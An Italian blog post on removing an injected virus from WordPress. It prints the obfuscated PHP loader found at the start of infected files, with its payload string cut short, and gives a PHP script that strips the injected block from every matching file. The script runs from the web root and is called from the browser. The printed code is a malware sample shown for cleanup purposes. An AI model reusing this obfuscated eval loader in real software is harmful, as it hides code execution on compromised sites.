Rimuovere un virus da wordpress

Non ho voglia di indagare da dove entrano e come fanno, suppongo sia qualcosa riguardo a xmlrpc, comunque mi capita di trovare in alcuni siti dei file in wordpress con un bel pezzo di codice all’inizio che fa più o meno così:

<?php $nuvjmhnfek = 'x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!})q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%xbq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>utcvt)!gj!|!*bubE{h%x5c%x78 .....
$nlbrprkqdg = explode(chr((208-164)),'3218,48,5590,70,4453,66,8070,26,2370,30,2907,69,714,25,4556,24,7366,42,6995,70,7662,67,7952,20,4821,58,5660,38,9197,50,3794,32,5475,53,5299,25,2451,49,3716,20,9116,48,8581,59,1739,50,6545,58,1693,46,950,66,7211,50,5528,62,7895,57,9591,46,9678,20,2282,23,6368,70,93,51,8483,44,1216,66,10078,28,4288,43,3130,61,2770,36,7408,26,6930,65,5039,22,8640,63,1059,70,7729,28,5919,23,5942,42,374,57,0,43,4580,43,1336,24,5061,55,3878,39,9371,41,9765,20,4141,66,3451,70,7972,36,8867,50,7470,51,6077,53,4076,65,9301,37,3521,62,9338,33,8008,36,5828,68,3040,67,7825,70,144,66,1016,43,3618,32,8203,39,6503,42,9463,21,7261,43,3107,23,2071,51,797,55,6832,56,1129,48,9045,22,1553,56,9484,43,10047,31,493,27,3365,23,4879,21,1456,35,5237,62,2860,47,852,38,9698,67,6130,23,9940,45,6335,33,280,52,1609,52,8527,54,4352,42,8917,65,2700,70,7107,48,520,52,5776,24,3191,27,3650,66,3855,23,4011,65,4254,34,7757,68,3826,29,8385,27,5205,32,6268,67,1953,70,9164,33,210,36,2228,54,7304,62,9785,66,9985,36,6235,33,4952,38,9527,64,1491,62,4394,59,9434,29,6153,34,8791,45,9067,49,8744,47,2806,54,8044,26,2047,24,332,42,8242,45,4207,47,43,50,2976,64,4990,49,5324,38,2023,24,3388,63,8412,43,9637,41,2609,64,6438,65,8351,34,3736,58,9907,33,10021,26,6053,24,1856,41,246,34,8160,43,4623,67,2122,70,1360,36,9247,54,8703,41,2589,20,5430,45,4519,37,1177,39,1661,32,1789,67,7626,36,5723,53,1282,54,762,35,4900,52,6603,49,2500,37,572,56,1396,20,6801,31,6652,29,2673,27,5362,68,5116,24,5698,25,7434,36,890,60,9412,22,7584,42,3266,70,6888,42,3968,43,7155,56,6735,66,5800,28,7065,42,2537,52,6681,54,739,23,7521,63,2192,36,6211,24,8096,64,4690,34,4724,59,2305,65,5140,65,3336,29,689,25,5896,23,1897,56,9851,56,3917,51,8455,28,1416,40,628,61,8836,31,5984,34,2400,51,6187,24,4783,38,6018,35,8982,63,431,62,3583,35,8287,64,4331,21'); $nmtziabvfq=substr($nuvjmhnfek,(64154-54048),(22-15)); if (!function_exists('mytkhaykjh')) { function mytkhaykjh($ecchzxeygg, $oetvzxrjls) { $gxtabrgvtm = NULL; for($vwguknkzdv=0;$vwguknkzdv<(sizeof($ecchzxeygg)/2);$vwguknkzdv++) { $gxtabrgvtm .= substr($oetvzxrjls, $ecchzxeygg[($vwguknkzdv*2)],$ecchzxeygg[($vwguknkzdv*2)+1]); } return $gxtabrgvtm; };} $sdeyycmzzj="\x20\57\x2a\40\x66\147\x74\157\x6e\166\x6c\170\x75\166\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\64\x36\55\x32\60\x39\51\x29\54\x20\143\x68\162\x28\50\x34\66\x32\55\x33\67\x30\51\x29\54\x20\155\x79\164\x6b\150\x61\171\x6b\152\x68\50\x24\156\x6c\142\x72\160\x72\153\x71\144\x67\54\x24\156\x75\166\x6a\155\x68\156\x66\145\x6b\51\x29\51\x3b\40\x2f\52\x20\170\x6f\171\x66\142\x63\152\x76\162\x6b\40\x2a\57\x20"; $dtpkwmfaou=substr($nuvjmhnfek,(67745-57632),(63-51)); $dtpkwmfaou($nmtziabvfq, $sdeyycmzzj, NULL); $dtpkwmfaou=$sdeyycmzzj; $dtpkwmfaou=(403-282); $nuvjmhnfek=$dtpkwmfaou-1; ?>

si potrebbe capire cosa fa (ho tagliato la stringa), ma non mi interessa.

Devo ripulire tutto. Questo è cosa uso:

<?php

$directory = dirname(__FILE__);

$iter = new RecursiveIteratorIterator(
				      new RecursiveDirectoryIterator($directory, RecursiveDirectoryIterator::SKIP_DOTS),
				      RecursiveIteratorIterator::SELF_FIRST,
				      RecursiveIteratorIterator::CATCH_GET_CHILD // Ignore "Permission denied"
);

header('Content-type: text/txt');

foreach($iter as $path => $fileInfo) {
  $pathEp = str_replace($directory,'',$path);
  if($fileInfo->isFile()) {
    if (preg_match('/php$/',$pathEp)) {
      $c = file_get_contents($path);
      if(preg_match('/^(<\?php\ \$nuv.+\?>)(.*)/',$c)) {
	echo "Infected: $pathEp\n";
	echo "should be:\n";
	$newC = preg_replace('/^(<\?php\ \$nuv.+\?>)(.*)/','$2',$c);
	//print $newC;
	file_put_contents($path,$newC);
	//exit();
      }
    }
  }
}

e basta. Metto ripulisci.php nella cartella principale e la chiamo dal sito.

Nota sulla foto: On North Wolcott, North of Augusta. There is a story behind … ma non la voglio sapere, rif.: https://secure.flickr.com/photos/44124372363@N01/4910423674/in/photolist-8tVcT9-iG6NUE-7yBpGK-bmL8Jm-9nkCHq-fchpRc-7D18d7-7CWipD-bTdHNX-86jtVn-iG5exo-a9bsLj-fbhikV-9Q1ayw-efVYdc-eg2HX9-efVYgp-eg2HTj-eg2HUJ-98GHvF-fd3VzD-do26Js-eRjTX7-81cs37-7GoXYL-8i2cp7-8xi4VB-aua6KB-atgC1z-fdDg8h-9SsQVV-aCcaqq-aHHR9P-8eeoFp-823o7n-9sV9d4-9NZEdN-dSbVyG-7ARMf7-jd9hZz-7BH2Q5-avsG3U-dxN8Dr-7NrEZo-c6yJQ1-9ZyNpV-812TCs-dCLwMU-8xXTjJ-ca4vws-9U18eE


Posted

in

,

by

Tags: